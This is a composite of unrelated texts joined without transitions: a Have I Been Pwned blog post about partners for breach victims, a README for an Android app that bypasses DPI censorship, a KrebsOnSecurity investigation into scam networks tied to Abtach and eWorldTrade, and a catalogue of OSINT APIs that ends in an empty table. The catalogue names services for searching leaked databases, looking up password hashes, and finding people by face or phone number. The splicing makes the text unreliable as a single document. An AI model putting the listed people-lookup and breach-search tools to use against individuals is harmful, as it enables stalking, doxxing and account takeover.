For many years, people would come to Have I Been Pwned (HIBP), run a search on their email address, get the big red "Oh no - pwned!" response and then... I'm not sure. We really didn't have much guidance until we partnered with 1Password and started giving specific advice about how to secure your digital life. So, that's passwords sorted, but the impact of data breaches goes well beyond passwords alone...
There are many different ways people are impacted by breaches, for example, identity fraud. Breaches frequently contain precisely the sort of information that opens the door to impersonation and just taking a quick look at the HIBP stats now, there's a lot of data out there:
That's just the big numbers, then there's the long tail of all sorts of other exposed high-risk data, including partial credit cards (32 breaches), government-issued IDs (18 breaches) and passport numbers (7 breaches). As well as helping people choose good passwords, we want to help them stay safe in the other aspects of their lives put at risk when hackers run riot.
Identity protection services are a good example, and I might be showing my age here, but I've been using them since the 90's. Today, I use a local Aussie one called Truyu which is built by the Commonwealth Bank. Let me give you two examples from them to illustrate why it's a useful service:
The first one came on Melbourne Cup day last year, a day when Aussies traditionally get drunk and lose money betting on horse races. Because gambling (sorry - "gaming") is a heavily regulated industry, a whole bunch of identity data has to be provided if you want to set up an account with the likes of SportsBet. Whilst I personally maintain that gambling is a tax on people who can't do maths, Charlotte was convinced we should have a go anyway, which resulted in Truyu popping up this alert:
This was me (and yes, of course we lost everything we bet) but... what if it wasn't me, and my personal information had been used by someone else to open the account? That's the sort of thing I'd want to know about fast. As for all those "Illion Credit Header" entries, I asked Truyu to help explain what they mean and why they're important to know:
Yep, I'd definitely want to know if it wasn't me that initiated all that!
Then, on a recent visit to see the Irish National Cyber Security Centre, we found ourselves hungry in Dublin. Google Maps recommended this epic sushi place, but when we arrived, a sign at the front advised they didn't accept credit cards - in 2025!! Carrying only digital cards, having no cash and being hungry for sushi, I explored the only other avenue the store suggested: creating a Revolut account. Doing so required a bunch of personal information because, like betting, finance is a heavily regulated industry. This earned me another early warning from Truyu about the use of my data:
I pay Truyu A$4.99 each month via a subscription on my iPhone, and IMHO, it's money well spent. For full disclosure, Truyu is also an enterprise subscriber to HIBP (like 1Password is), and you can see breaches we've processed in their app too. I've included them here because they're a great example of a service that adds real value "after the breach", and it's one I genuinely use myself.
The point of all this is that there are organisations out there offering services that are particularly relevant to data breach victims, and we'd like to find the really good ones and put them on the new HIBP website. We've even built out some all-new dedicated spaces, for example on the new breach page:
But choosing partners is a bit more nuanced than that. A service like Truyu caters to an Aussie audience, for example, and identity protection works differently in places like the US or UK. We need different partners in different parts of the world, and further, partners offering different services. Identity protection is one thing, but what else? There are many different risks that both individuals and organisations (of which there are hundreds of thousands using HIBP today) face after being in a data breach.
So, we're looking for more partners that can make a positive difference for the folks that land on HIBP, do a search and then ask "now what?!" We're obviously going to be very selective and very cautious about who we work with because the trust people have in HIBP is not something I'll ever jeopardise by selecting the wrong partners. And, of course, any other brand that appears on this site needs to be one that reflects not just our values and mission, but is complementary to our favourite password manager as well.
Now that we're on the cusp of launching this new site (May 17 is our target), I'm inviting any organisations that think they fit the bill to get in touch with me and explain how they can make a positive difference to data breach victims looking for answers "after the breach".
Android application that runs a local VPN service to bypass DPI (Deep Packet Inspection) and censorship.
This application runs ByeDPI as a local SOCKS5 proxy and redirects all device traffic through it.
https://github.com/dovecoteescapee/ByeDPIAndroid
To bypass some blocks, you may need to change the settings. More about the various settings can be found in the ByeDPI documentation.
You can ask for help in the project's discussions.
No. All application features work without root.
No. The application uses the VPN mode on Android to redirect traffic, but does not send anything to a remote server. It does not encrypt traffic and does not hide your IP address.
```plaintext
Proxy type: SOCKS5
Proxy host: 127.0.0.1
Proxy port: 1080 (default)
```
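As a quick sanity check that the local proxy is actually listening (a minimal sketch, assuming curl is available in a terminal on the device, e.g. via Termux; the target URL is just a placeholder):

```bash
# Send one request through the local ByeDPI SOCKS5 proxy (default port shown above).
# The app must be running with the proxy started for this to succeed.
curl --socks5-hostname 127.0.0.1:1080 -I https://example.com
```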
None. The application does not send any data to a remote server. All traffic is processed on the device.
DPI (Deep Packet Inspection) is a technology for analyzing and filtering traffic. It is used by providers and government agencies to block sites and services.
For building the application, you need:
To build the application:
```bash
git clone --recurse-submodules https://github.com/dovecoteescapee/ByeDPIAndroid
```
```bash
./gradlew assembleRelease
```
The built APK will be located in app/build/outputs/apk/release/.
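To sideload the build onto a device over USB debugging, something like the following should work; the exact APK filename depends on your Gradle configuration, so treat it as a placeholder:

```bash
# Install the release APK produced by the build step above.
# Adjust the filename to match what Gradle actually generated.
adb install app/build/outputs/apk/release/app-release.apk
```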
A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.
In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”
Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.
A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.
However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.
Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).
In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”
Abtach offered trademark registration at suspiciously low prices compared to the legitimate cost of over $1,500, and claimed it could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.
In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.
Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.
People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”
“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”
Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.
“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.
In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.
A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.
The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.
The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”
According to the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.
Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today.
Junaid Mansoor. Source: youtube/@Olevels․com School.
Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services.
Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.
The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”
Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.
“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.
The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.
KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.
For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.
A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.
360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.
Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services. Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.
360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.
Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.
In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com — alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.
Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.
The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.
In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.
The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.
The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.
“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”
Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.
“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.
A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.
Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others. The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.
Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.
California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.
In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.
“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”
It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.
“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.
The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.
A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.
KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.
Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.
“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”
Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”
From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.
On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.
This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.
KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.
For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.
Name | Link | Description | Price |
---|---|---|---|
Shodan | https://developer.shodan.io | Search engine for Internet connected host and devices | from $59/month |
Netlas.io | https://netlas-api.readthedocs.io/en/latest/ | Search engine for Internet connected host and devices. Read more at Netlas CookBook | Partly FREE |
Fofa.so | https://fofa.so/static_pages/api_help | Search engine for Internet connected host and devices | ??? |
Censys.io | https://censys.io/api | Search engine for Internet connected host and devices | Partly FREE |
Hunter.how | https://hunter.how/search-api | Search engine for Internet connected host and devices | Partly FREE |
Fullhunt.io | https://api-docs.fullhunt.io/#introduction | Search engine for Internet connected host and devices | Partly FREE |
IPQuery.io | https://ipquery.io | API for IP information such as IP risk, geolocation data, and ASN details | FREE
Name | Link | Description | Price |
---|---|---|---|
Social Links | https://sociallinks.io/products/sl-api | Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo | PAID. Price per request |
Name | Link | Description | Price |
---|---|---|---|
Numverify | https://numverify.com | Global Phone Number Validation & Lookup JSON API. Supports 232 countries. | 250 requests FREE |
Twilio | https://www.twilio.com/docs/lookup/api | Provides a way to retrieve additional information about a phone number | Free or $0.01 per request (for caller lookup)
Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | from $0.04 per request |
GetContact | https://github.com/kovinevmv/getcontact | Find info about a user by phone number | from $6.89/month for 100 requests
Veriphone | https://veriphone.io/ | Phone number validation & carrier lookup | 1000 requests/month FREE |
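As a rough sketch of how these phone lookup APIs are typically called from the command line (this assumes a Numverify API key; the key, number and exact parameters are placeholders, so check the provider's docs):

```bash
# Validate a phone number via Numverify and pretty-print the JSON response.
# YOUR_API_KEY and the number below are placeholders.
curl -s "http://apilayer.net/api/validate?access_key=YOUR_API_KEY&number=14158586273" | jq .
```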
Name | Link | Description | Price |
---|---|---|---|
Global Address | https://rapidapi.com/adminMelissa/api/global-address/ | Easily verify, check or lookup address | FREE |
US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
Google Maps Geocoding API | https://developers.google.com/maps/documentation/geocoding/overview | convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | 0.005 USD per request |
Postcoder | https://postcoder.com/address-lookup | Find an address by postcode | £130/5000 requests
Zipcodebase | https://zipcodebase.com | Lookup postal codes, calculate distances and much more | 5000 requests FREE |
Openweathermap geocoding API | https://openweathermap.org/api/geocoding-api | get geographical coordinates (lat, lon) by using name of the location (city name or area name) | 60 calls/minute 1,000,000 calls/month |
DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate and plan your routes | $1.25-$2 per 1000 elements |
Geotagging API | https://geotagging.ai/ | Predict geolocations by texts | Freemium |
Name | Link | Description | Price |
---|---|---|---|
Appruve.co | https://appruve.co | Allows you to verify the identities of individuals and businesses, and connect to financial account data across Africa | Paid
Onfido.com | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. | Paid
Surepass.io | https://surepass.io/passport-id-verification-api/ | Passport, Photo ID and Driver License Verification in India | Paid
Name | Link | Description | Price |
---|---|---|---|
Open corporates | https://api.opencorporates.com | Companies information | Paid, price upon request |
Linkedin company search API | https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
Mattermark | https://rapidapi.com/raygorodskij/api/Mattermark/ | Get companies and investor information | free 14-day trial, from $49 per month |
Name | Link | Description | Price |
---|---|---|---|
API OSINT DS | https://github.com/davidonzo/apiosintDS | Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 | FREE |
InfoDB API | https://www.ipinfodb.com/api | The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format | FREE |
Domainsdb.info | https://domainsdb.info | Registered Domain Names Search | FREE |
BGPView | https://bgpview.docs.apiary.io/# | Allows consumers to view all sorts of analytics data about the current state and structure of the internet | FREE
DNSCheck | https://www.dnscheck.co/api | monitor the status of both individual DNS records and groups of related DNS records | up to 10 DNS records/FREE |
Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More | FREE |
Host.io | https://host.io/ | Get info about domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
BeVigil OSINT API | https://bevigil.com/osint-api | provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com | 50 credits free/1000 credits/$50 |
Name | Link | Description | Price |
---|---|---|---|
WebScraping.AI | https://webscraping.ai/ | Web Scraping API with built-in proxies and JS rendering | FREE |
ZenRows | https://www.zenrows.com/ | Web Scraping API that bypasses anti-bot solutions while offering JS rendering and rotating proxies | FREE
Name | Link | Description | Price |
---|---|---|---|
Whois freaks | https://whoisfreaks.com/ | well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet | $19/5000 requests |
WhoisXMLApi | https://whois.whoisxmlapi.com | gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests in month/FREE |
IP2WHOIS | https://www.ip2whois.com/developers-api | Get detailed info about a domain | 500 requests/month FREE
Name | Link | Description | Price |
---|---|---|---|
Ipstack | https://ipstack.com | Detect country, region, city and zip code | FREE |
Ipgeolocation.io | https://ipgeolocation.io | provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30 000 requests per month/FREE |
IPInfoDB | https://ipinfodb.com/api | Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address | FREE |
IP API | https://ip-api.com/ | Free domain/IP geolocation info | FREE |
Name | Link | Description | Price |
---|---|---|---|
Mylnikov API | https://www.mylnikov.org | public API implementation of Wi-Fi Geo-Location database | FREE |
Wigle | https://api.wigle.net/ | get location and other information by SSID | FREE |
Name | Link | Description | Price |
---|---|---|---|
PeeringDB | https://www.peeringdb.com/apidocs/ | Database of networks, and the go-to location for interconnection data | FREE
PacketTotal | https://packettotal.com/api.html | Analyze .pcap files | FREE
Name | Link | Description | Price |
---|---|---|---|
Binlist.net | https://binlist.net/ | get information about bank by BIN | FREE |
FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | institutions, locations and history events | FREE |
Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation and VAT number validation | FREE |
Alpaca | https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ | Realtime and historical market data on all US equities and ETFs | FREE |
Swiftcodesapi | https://swiftcodesapi.com | Verifying the validity of a bank SWIFT code or IBAN account number | $39 per month/4000 swift lookups |
IBANAPI | https://ibanapi.com | Validate IBAN number and get bank account information from it | Freemium/10$ Starter plan |
Name | Link | Description | Price |
---|---|---|---|
EVA | https://eva.pingutil.com/ | Measuring email deliverability & quality | FREE |
Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability & quality | 100 requests FREE, 5000 requests in month — $14.49 |
EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. | 200 requests FREE, 5000 requests — $40
Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone's email address and ensure your emails reach real people | from $49/month
Kickbox | https://open.kickbox.com/ | Email verification API | FREE |
FachaAPI | https://api.facha.dev/ | Allows checking if an email domain is a temporary email domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
Genderize.io | https://genderize.io | Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. | 1000 names/day free |
Agify.io | https://agify.io | Predicts the age of a person given their name | 1000 names/day free |
Nationalize.io | https://nationalize.io | Predicts the nationality of a person given their name | 1000 names/day free
Name | Link | Description | Price |
---|---|---|---|
HaveIBeenPwned | https://haveibeenpwned.com/API/v3 | Retrieve the list of breaches for pwned accounts (email addresses and usernames) | $3.50 per month
Psbdmp.ws | https://psbdmp.ws/api | Search in Pastebin dumps | $9.95 per 10000 requests
LeakPeek | https://psbdmp.ws/api | Search in leaked databases | $9.99 per 4 weeks unlimited access
BreachDirectory.com | https://breachdirectory.com/api_documentation | search domain in data breaches databases | FREE |
LeakLookup | https://leak-lookup.com/api | Search for a domain, email address, full name, IP address, phone, password or username in leaked databases | 10 requests FREE
BreachDirectory.org | https://rapidapi.com/rohan-patra/api/breachdirectory/pricing | Search for a domain, email address, full name, IP address, phone, password or username in leaked databases (possible to view password hashes) | 50 requests/month FREE
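To give a feel for the breach lookup APIs above, here is a hedged sketch against the HIBP v3 endpoint (it assumes you have an API key; the email address is a placeholder):

```bash
# List the breaches an account appears in via Have I Been Pwned v3.
# Requires a paid hibp-api-key; HIBP also expects a user-agent header.
curl -s "https://haveibeenpwned.com/api/v3/breachedaccount/test@example.com" \
  -H "hibp-api-key: YOUR_API_KEY" \
  -H "user-agent: osint-api-demo" | jq '.[].Name'
```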
Name | Link | Description | Price |
---|---|---|---|
Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
TROVE (Australian Web Archive) API | https://trove.nla.gov.au/about/create-something/using-api | Retrieve information about TROVE capture data | FREE |
Archive-it API | https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API | Retrieve information about archive-it capture data | FREE |
UK Web Archive API | https://ukwa-manage.readthedocs.io/en/latest/#api-reference | Retrieve information about UK Web Archive capture data | FREE |
Arquivo.pt API | https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API | Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. | FREE |
Library Of Congress archive API | https://www.loc.gov/apis/ | Provides structured data about Library of Congress collections | FREE |
BotsArchive | https://botsarchive.com/docs.html | JSON formatted details about Telegram Bots available in database | FREE |
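As a quick example of the archive APIs above, the Wayback Availability JSON API can be queried with a single unauthenticated request:

```bash
# Ask the Wayback Machine whether a snapshot of a URL exists
# and print the closest archived capture.
curl -s "https://archive.org/wayback/available?url=example.com" | jq '.archived_snapshots'
```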
Name | Link | Description | Price |
---|---|---|---|
MD5 Decrypt | https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | 1.99 EURO/day |
Name | Link | Description | Price |
---|---|---|---|
BTC.com | https://btc.com/btc/adapter?type=api-doc | Get information about addresses and transactions | FREE
Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) | $0.33 - $1 per 1000 calls |
Bitcoinabuse | https://www.bitcoinabuse.com/api-docs | Lookup bitcoin addresses that have been linked to criminal activity | FREE
Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on the Bitcoin Address | FREE |
Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
apilayer coinlayer | https://coinlayer.com | Real-time Crypto Currency Exchange Rates | FREE |
BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historic crypto data from more than 200+ exchanges | FREE |
WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrencies Prices | FREE |
WalletLabels | https://www.walletlabels.xyz/docs | Labels for 7.5 million Ethereum wallets | FREE
Name | Link | Description | Price |
---|---|---|---|
VirusTotal | https://developers.virustotal.com/reference | Analyze files and URLs | Public API is FREE
AbuseIPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE
AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
URLScan.io | https://urlscan.io/about-api/ | Scan and Analyse URLs | FREE |
Web of Trust | https://support.mywot.com/hc/en-us/sections/360004477734-API- | IP/domain/URL reputation | FREE
Threat Jammer | https://threatjammer.com/docs/introduction-threat-jammer-user-api | IP/domain/URL reputation | ??? |
Name | Link | Description | Price |
---|---|---|---|
Search4faces | https://search4faces.com/api.html | Search for people in social networks by facial image | $21 per 1000 requests
## Face Detection
Name | Link | Description | Price |
---|---|---|---|
